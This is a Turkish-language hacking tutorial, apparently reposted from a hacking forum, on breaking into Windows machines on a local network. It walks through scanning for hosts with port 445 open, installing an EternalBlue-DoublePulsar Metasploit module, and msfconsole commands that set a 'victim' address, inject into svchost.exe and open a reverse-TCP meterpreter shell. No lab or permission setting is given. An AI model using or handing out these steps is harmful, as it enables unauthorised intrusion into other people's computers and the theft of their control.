Aynı Ağdaki PC'ye Sızma [Açık Port Zafiyeti İle] [Kali Linux] [Hedefe Hiçbir Şey Göndermenize Gerek Yok]

Bugün  Sizlere Nasıl Hedef'e Hiçbir Şey Göndermeden Sızabileceğinizi  Göstericem [Ne link,Ne Zararlı .exe v.s Göndermenize Gerek Yok]  Başlayalım ; 

Öncelikle HEDEF BİLGİSAYARDA GÜVENLİK DUVARI KAPALI OLMAK ZORUNDA AKSİ HALDE AÇIK PORT BULAMAZSINIZ. 

Sızabileceğiniz Sistemler [Windows 10, 8 ve 8.1  de işe yaramıyor..] :
 

• Windows XP (all services pack) (x86) (x64)
  Windows Server 2003 SP0 (x86)
  Windows Server 2003 SP1/SP2 (x86)
  Windows Server 2003 (x64)
  Windows Vista (x86)
  Windows Vista (x64)
  Windows Server 2008 (x86)
  Windows Server 2008 R2 (x86) (x64)
  Windows 7 (all services pack) (x86) (x64)
   

---------Xerosploit Adımı (Ağdaki PC'leri Taramak İçin)---------- 

1.  İndirme Linki : https://github.com/LionSec/xerosploit

 1) Ağdaki Bilgisayarları Taramak İçin:                                                                
-İlk önce sanal bilgisayarınıza "xerosploit" kurun (GitHub da Var). ve kurduktan sonra                
terminali açıp "sudo xerosploit" yazın.  

2-)Tarama İşlemi:                                                                                    
-Xerosploit Ekranındayken "scan" yazın "enter" tuşuna basın. 

 3) Açık Port Taraması İçin Hedefi Seçme İşlemi:                                                                            
-Tarama bittikten sonra hedef pc'nin ipv4 adresini yazın ve enter'a basın                             
(firewall kapalı olan bir hedef seçin kendinize, eğer emin değilseniz
firewall kapalı mı diye teker teker bütün ipv4 adreslerini tarayın 455 portu gözükene kadar.) 

 4) Açık Port Tarama:                                                                                  
-Xerosploit ekranındayken "pscan" diyin hemen sonra "run" diyin.                                      
işlem bitince kare kutuda bu satırın çıkması gerek : "MICROSOFT-DS | 445/TCP | OPEN |"                
eğer çıktıysa tamamdır xerosploit den çıkabilirsiniz (eğer o satır çıkmazsa farklı pc'leri deneyin veya firewallı
kapalı olduğuna emin olduğunuz pc'lere bakın) 

 ---------Eternalblue-Doublepulsar-Me.tasploit Adımı [Kurulum Adımı]-----------
 

1) Eternalblue-Doublepulsar-Met.asploit İndirme Ve Kurma İşlemi:
Terminali Açın ve Şu Komutları Yazın; 

 -git clone https://github.com/ElevenPaths/Etern...sar-****sploit
-cd Eternalblue-Doublepulsar-Met.asploit
-mv eternalblue_doublepulsar.rb /usr/share/Met.asploit-framework/modules/exploits/windows/smb
 [Met'in yanındaki noktayı silmeyi unutmayın] 

 Sırasıyla bu komutları yazın terminale bitince de "msfconsole" yazın 

 -----------MsfConsole Adımı [Hedef PC'ye Sızma Adımı]-------------
 

Msf Ekranındayken de Şu Komutları Yazın :
-use exploit/windows/smb/eternalblue_doublepulsar
-set rhost "kurbanın ipv4 adresi (xerosplit de hedeflediğimiz ipv4)"
-set PROCESSINJECT svchost.exe
-set payload windows/meterpreter/reverse_tcp
-set lhost "sizin linux pc ipv4 adresi"
-exploit
diyin ve beklemede kalın taki "meterpreter" gelene kadar eğer gelmezse bir daha "exploit" yazın o zaman kesin gelicektir.
Artık Sistemdeyiz  

Videolu Anlatım :

 [-Hata/Hatalar Ve Çözümleri-] 

HATA KODU : "Ooops Something Went Error!" 

Çözümü : Terminali açın ve şu komutu yazın :  

Kod:

 

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

 Eğer kodda hata verirse şu videoya bakın : 

Resim ve Makale Kaynağı : http://www.turkhackteam.org/exploitler/1585416-ayni-agdaki-pcye-sizma-acik-port-zafiyeti-ile-kali-linux-hedefe-hicbir-sey-gondermenize-gerek-yok.html